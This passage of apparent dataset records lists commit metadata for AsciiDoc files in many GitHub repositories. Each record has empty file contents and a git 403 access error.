ch,Brijeshrpatel9\/elasticsearch,EasonYi\/elasticsearch,YosuaMichael\/elasticsearch,hydro2k\/elasticsearch,jpountz\/elasticsearch,himanshuag\/elasticsearch,franklanganke\/elasticsearch,alexbrasetvik\/elasticsearch,shreejay\/elasticsearch,dataduke\/elasticsearch,ivansun1010\/elasticsearch,rhoml\/elasticsearch,PhaedrusTheGreek\/elasticsearch,JackyMai\/elasticsearch,Chhunlong\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,i-am-Nathan\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Uiho\/elasticsearch,tsohil\/elasticsearch,humandb\/elasticsearch,dpursehouse\/elasticsearch,lchennup\/elasticsearch,mrorii\/elasticsearch,andrestc\/elasticsearch,nellicus\/elasticsearch,schonfeld\/elasticsearch,k
arthikjaps\/elasticsearch,ckclark\/elasticsearch,Siddartha07\/elasticsearch,polyfractal\/elasticsearch,masaruh\/elasticsearch,LeoYao\/elasticsearch,wittyameta\/elasticsearch,episerver\/elasticsearch,MetSystem\/elasticsearch,elancom\/elasticsearch,achow\/elasticsearch,onegambler\/elasticsearch,xpandan\/elasticsearch,djschny\/elasticsearch,jbertouch\/elasticsearch,luiseduardohdbackup\/elasticsearch,martinstuga\/elasticsearch,Fsero\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,nellicus\/elasticsearch,jsgao0\/elasticsearch,MjAbuz\/elasticsearch,markwalkom\/elasticsearch,mnylen\/elasticsearch,obourgain\/elasticsearch,beiske\/elasticsearch,nomoa\/elasticsearch,davidvgalbraith\/elasticsearch,yuy168\/elasticsearch,MetSystem\/elasticsearch,yongminxia\/elasticsearch,polyfractal\/elasticsearch,winstonewert\/elasticsearch,huanzhong\/elasticsearch,uschindler\/elasticsearch,girirajsharma\/elasticsearch,bawse\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/elasticsearch,nellicus\/elasticsearch,markllama\/elasticsearch,mm0\/elasticsearch,LewayneNaidoo\/elasticsearch,ThalaivaStars\/OrgRepo1,xpandan\/elasticsearch,AshishThakur\/elasticsearch,MisterAndersen\/elasticsearch,djschny\/elasticsearch,18098924759\/elasticsearch,avikurapati\/elasticsearch,JSCooke\/elasticsearch,snikch\/elasticsearch,hirdesh2008\/elasticsearch,Rygbee\/elasticsearch,vroyer\/elasticassandra,Liziyao\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,mapr\/elasticsearch,karthikjaps\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_2_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22eeee0ddaca322aeb635610b511284753318692","subject":"Re-worked and edited","message":"Re-worked and edited\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/How_it_works.adoc","new_file":"docs\/How_it_works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38f7ce407dbc3cb559436a97577fa40dd90d7ed2","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f439945abb970df4551cb1266701642e74b48f4","subject":"Added IoCs for GreyEnergy","message":"Added IoCs for GreyEnergy\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"greyenergy\/README.adoc","new_file":"greyenergy\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 
{"commit":"4aea46677f16ad7c46947609327d53c09f0e6072","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fffbc8bb0f2255c06fc553954f1d13543c4936c","subject":"docs: added contributing section for new third-party dependencies","message":"docs: added contributing section for new third-party dependencies\n\nChange-Id: Ic5c8e0feaead7252c0e66ae4aeacac4932be1a10\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13258\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45bbee6f1553e4705a9f0f62c893c49b0329548b","subject":"y2b create post Audio Mind Blow (Get Your Headphones)","message":"y2b create post Audio Mind Blow (Get Your Headphones)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-28-Audio-Mind-Blow-Get-Your-Headphones.adoc","new_file":"_posts\/2014-02-28-Audio-Mind-Blow-Get-Your-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe6e9cc6ee5e2abedf38756dc3e906ae5b0bb68","subject":"addtions to NOTES.adoc","message":"addtions to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b2d7ddca1163340f913cf4425d5dba7088e28f6","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75debc980f0519f624042c42e7dc3daada5e153c","subject":"Update 2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","message":"Update 2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","new_file":"_posts\/2017-11-06-Label-Encoder-for-multi-word-with-Count-Vectorizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f911a42ab3a6ebc1d9460b8e1bd6e781f91ff43","subject":"Renamed '_posts\/2020-02-04-SSE-SIMD.adoc' to '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","message":"Renamed '_posts\/2020-02-04-SSE-SIMD.adoc' to '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276c5041846c80b1e592e8b4e8544df739dea1a9","subject":"create post Unboxing The Samsung Galaxy S9 Clone","message":"create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-The-Samsung-Galaxy-S9-Clone.adoc","new_file":"_posts\/2018-02-26-Unboxing-The-Samsung-Galaxy-S9-Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"721ad00cc82bddcc327ffe4a0f0210e1b8764456","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6f1ee9bc474e768e6bc278aa254656bcaec7b2","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"6123c264abd355031914539625540da2204582b0","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7060ae67e72ed1cd0f288ee27cb2b515e05a7843","subject":"Job: #11761","message":"Job: #11761\n\nAdd int\n","repos":"keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11761\/11761_configurable_graphical_comparison.int.adoc","new_file":"doc-bridgepoint\/notes\/11761\/11761_configurable_graphical_comparison.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c8d866f757b9eb82e42abbf3816443bdc8862df","subject":"Create index-fil.adoc","message":"Create index-fil.adoc\n\nFilipino translation for index.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"index-fil.adoc","new_file":"index-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b030fc03cb434ea0dbb9d16271c2263efaf9ed0","subject":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","message":"Update 
2018-04-16-When-is-using-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5bb3addc61023dbb579121e15c595edf3310653","subject":"Update 2015-07-13-Playing-with-Source-Maps.adoc","message":"Update 2015-07-13-Playing-with-Source-Maps.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-07-13-Playing-with-Source-Maps.adoc","new_file":"_posts\/2015-07-13-Playing-with-Source-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e66c93b8cafe566bb12d545c62205cd79ffb4bf4","subject":"Update 2018-02-08-Accessibility-in-a-modal.adoc","message":"Update 2018-02-08-Accessibility-in-a-modal.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-02-08-Accessibility-in-a-modal.adoc","new_file":"_posts\/2018-02-08-Accessibility-in-a-modal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37362320def2257bba808b1acdb4f843316ebe56","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","message":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb2fd40a85e7f1834b331ed9bea424f50f1b9e21","subject":"Update 2016-03-01-Ride-the-Nashorn.adoc","message":"Update 2016-03-01-Ride-the-Nashorn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2016-03-01-Ride-the-Nashorn.adoc","new_file":"_posts\/2016-03-01-Ride-the-Nashorn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9d60466b08b140754ff9948af38360ab4bd43ea","subject":"Deleted _posts\/2016-06-18-Non-secure-icons.adoc","message":"Deleted 
_posts\/2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03397e1e120eede58fcb2b4c2c9dde6e9ba8278a","subject":"Update 2017-05-28.adoc","message":"Update 2017-05-28.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28.adoc","new_file":"_posts\/2017-05-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2daae0307baaf3badc1ecae08c091e56252709b","subject":"Update 2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","message":"Update 2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","new_file":"_posts\/2015-02-06-How-Social-Media-Can-Open-Doors-to-New-Opportunites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc1a35314ae0f276e5c058768b75278c54b7cd42","subject":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f25e58a2573e7df4fa2a2004b45318916028b630","subject":"[DOCS] Add 'remote clusters' requirement link to CCR docs (#47185)","message":"[DOCS] Add 'remote clusters' requirement link to CCR docs 
(#47185)\n\n","repos":"coding0011\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/ccr\/overview.asciidoc","new_file":"docs\/reference\/ccr\/overview.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a5f6d076fa2193f12c93e6561ebad613ed663d","subject":"Revert: Deleted _posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","message":"Revert: Deleted _posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc\n","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sskorol\/sskorol.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6154da28ba788bf55520a05117f7a23d5ea26c47","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc8ee3b292256b2e21f43aa39752bb5865d9a8b0","subject":"Update 2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","message":"Update 2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","new_file":"_posts\/2015-06-17-Slides-Des-jeux-et-des-enigmes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae9eaa69b94d3afc6089d2609eb250bd2a84695","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98d1e15a4909571a305b2136e486ad094c928ec3","subject":"y2b create post VIDEO GAME KNIVES IN REAL LIFE","message":"y2b create post VIDEO GAME KNIVES IN REAL LIFE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-16-VIDEO-GAME-KNIVES-IN-REAL-LIFE.adoc","new_file":"_posts\/2016-06-16-VIDEO-GAME-KNIVES-IN-REAL-LIFE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9f4c41e3137f113521b16a298569d4e74077dd","subject":"Update 2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","message":"Update 2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","new_file":"_posts\/2016-09-20-Pourquoi-venir-au-Hackergarten.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"311d6a0f873fabb80d470417a142d298839cef72","subject":"y2b create post Skyward Sword Winner \\u0026 My CES Trip","message":"y2b create post Skyward Sword Winner \\u0026 My CES Trip","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-03-Skyward-Sword-Winner-u0026-My-CES-Trip.adoc","new_file":"_posts\/2012-01-03-Skyward-Sword-Winner-u0026-My-CES-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48569f10b995b00360b45ef05e44df359f9fbc48","subject":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","message":"Update 2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_file":"_posts\/2015-09-21-How-to-Think-Like-a-Computer-Scientist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d4e5e36b39c8e0ceb3ea18f8f013c263415d53","subject":"Update readme","message":"Update 
